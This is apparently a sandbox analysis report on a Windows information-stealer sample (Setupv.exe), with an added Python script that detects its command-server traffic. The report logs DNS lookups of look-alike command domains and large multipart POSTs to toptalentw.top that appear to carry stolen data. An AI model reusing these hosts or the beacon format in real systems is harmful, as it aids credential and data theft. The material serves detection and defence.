Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=n2O6r5Alv1GWjGKnMf | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 14929 | Host: toptalentw.top
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MjYU1bfK4GdCYGj81 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 15073 | Host: toptalentw.top
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7tfr7jpx9ESjC6xCI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20562 | Host: toptalentw.top
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=M09Efv1f20zz1AhfYCv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2401 | Host: toptalentw.top
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2I9UW0E70hbAb | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 590349 | Host: toptalentw.top
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 95 | Host: toptalentw.top
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic | HTTP traffic detected: GET /profiles/76561199845513035 HTTP/1.1 | Connection: Keep-Alive | Host: steamcommunity.com
Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-EncodingVarysteamCountry=US%7Ccf72e8d7385b2d4d64dd054efa94cd8a; path=/; secure; HttpOnly; SameSite=Nonesessionid=7211436345a6db4b4f547bd8; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35880Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 28 Apr 2025 17:34:51 GMTDateProxy-Connectionkeep-aliveConnectionno-cacheCache-Control | equals www.youtube.com (Youtube)
Source: Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ h | equals www.youtube.com (Youtube)
Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com | equals www.youtube.com (Youtube)
Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com | equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: transdataa.digital
        Source: global traffic | DNS traffic detected: DNS query: geographys.run
        Source: global traffic | DNS traffic detected: DNS query: woodpeckersd.run
        Source: global traffic | DNS traffic detected: DNS query: tropiscbs.live
        Source: global traffic | DNS traffic detected: DNS query: cartograhphy.top
        Source: global traffic | DNS traffic detected: DNS query: biosphxere.digital
        Source: global traffic | DNS traffic detected: DNS query: topographky.top
        Source: global traffic | DNS traffic detected: DNS query: climatologfy.top
        Source: global traffic | DNS traffic detected: DNS query: vigorbridgoe.top
        Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
        Source: global traffic | DNS traffic detected: DNS query: toptalentw.top
        Source: unknown | HTTP traffic detected:
            POST /xwpa HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
            Content-Length: 57
            Host: transdataa.digital
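The DNS rows above list the domains the sample resolved one after another, and the HTTP row shows the form-encoded POST it sent to the first of them; the memory strings further down carry the steamcommunity.com profile URLs for SteamID 76561199845513035. The following Python is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses a constructed copy of that POST, checks it against the report's domain list, and pulls known C2 hosts and Steam profile IDs out of a strings dump so the same indicators can be applied to other captures. The treatment of 4-character POST paths as a secondary signal, the placeholder request body and the sample strings are assumptions of the example, not facts from the report.

```python
import re
from typing import Dict, Iterable, List, Set

# Domains the sample resolved during the run (taken from the DNS rows of the
# report). steamcommunity.com is left out on purpose: the sample fetches a
# legitimate profile page there, so the host alone is not a C2 indicator.
LUMMA_C2_DOMAINS: Set[str] = {
    "transdataa.digital", "geographys.run", "woodpeckersd.run", "tropiscbs.live",
    "cartograhphy.top", "biosphxere.digital", "topographky.top", "climatologfy.top",
    "vigorbridgoe.top", "toptalentw.top",
}

# SteamID64 (17 digits) in the profile URLs the sample carries in memory.
STEAM_PROFILE_RE = re.compile(r"https?://steamcommunity\.com/profiles/(\d{17})")
# Host part of any http(s) URL inside a string (simplified for this example).
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})(?::\d+)?", re.I)


def parse_http_request(raw: bytes) -> Dict[str, str]:
    """Parse the request line and headers of a raw HTTP/1.1 request.

    Header names are lower-cased; the request line is exposed as method,
    path and version; whatever follows the blank line is returned as body.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    req = {"method": method, "path": path, "version": version,
           "body": body.decode("latin-1")}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        req[name.strip().lower()] = value.strip()
    return req


def classify_request(req: Dict[str, str]) -> List[str]:
    """Return the reasons a parsed request matches the beacon seen in the report."""
    reasons: List[str] = []
    host = req.get("host", "").lower().split(":")[0]
    if host in LUMMA_C2_DOMAINS:
        reasons.append(f"host {host} is in the sample's C2 domain list")
    if (
        req["method"] == "POST"
        and req.get("content-type", "").startswith("application/x-www-form-urlencoded")
        and re.fullmatch(r"/[a-z0-9]{4}", req["path"]) is not None
    ):
        # Assumption of this example: the 4-character paths in the report
        # (/xwpa, /tqoa, /kbud, /ixau) are a weak secondary signal that only
        # means something together with the host match.
        reasons.append("form-encoded POST to a 4-character path")
    return reasons


def scan_strings(strings: Iterable[str]) -> Dict[str, List[str]]:
    """Pull known C2 hosts and Steam profile IDs out of a strings dump."""
    hosts: Set[str] = set()
    profiles: Set[str] = set()
    for s in strings:
        profiles.update(STEAM_PROFILE_RE.findall(s))
        for m in HOST_RE.finditer(s):
            host = m.group(1).lower()
            if host in LUMMA_C2_DOMAINS:
                hosts.add(host)
    return {"c2_hosts": sorted(hosts), "steam_profiles": sorted(profiles)}


# Constructed inputs modelled on the report rows; this is not captured traffic.
# The 57-byte body is a placeholder, not the stealer's real check-in format.
SAMPLE_REQUEST = (
    b"POST /xwpa HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 57\r\n"
    b"Host: transdataa.digital\r\n"
    b"\r\n" + b"a=" + b"x" * 55
)
BENIGN_REQUEST = (
    b"GET /profiles/76561199845513035 HTTP/1.1\r\nHost: steamcommunity.com\r\n\r\n"
)
SAMPLE_STRINGS = [  # constructed, modelled on the "String found in memory" rows
    "https://steamcommunity.com/profiles/76561199845513035",
    "https://biosphxere.digital:443/tqoa",
    "https://climatologfy.top/kbud",
    "https://community.cloudflare.steamstatic.com/",
    "http://ocsp.sectigo.com0",
]

if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    print(req["host"], req["path"], classify_request(req))
    print(classify_request(parse_http_request(BENIGN_REQUEST)))
    print(scan_strings(SAMPLE_STRINGS))
```

The benign GET to steamcommunity.com produces no reasons even though the profile ID is the one the sample uses: the profile URL is an indicator when found inside an unrelated binary's memory, not on the wire, which is why it is only looked for by scan_strings.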
Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: Setupv.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: Setupv.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
        Source: Setupv.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: Setupv.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
        Source: Setupv.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: Setupv.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
        Source: Setupv.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: Setupv.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
        Source: Setupv.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
        Source: Setupv.exe | String found in binary or memory: http://ocsp.comodoca.com0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Setupv.exe | String found in binary or memory: http://ocsp.sectigo.com0
        Source: Setupv.exe | String found in binary or memory: http://ocsp.sectigo.com0B
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowern:
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://biosphxere.digital/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://biosphxere.digital/tqoa
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://biosphxere.digital:443/tqoa
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cartograhphy.top/ixau3
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cartograhphy.top:443/ixauaD(
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://climatologfy.top/kbud
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://climatologfy.top:443/kbud
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/
        Source: Setupv.exe, 00000000.00000002.1855754534.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwA
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=OftCDPJyLyB9&l=english&am
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=SYITZEvy19LV&l=en
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=QS5Fks-FfPa3&l=engli
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
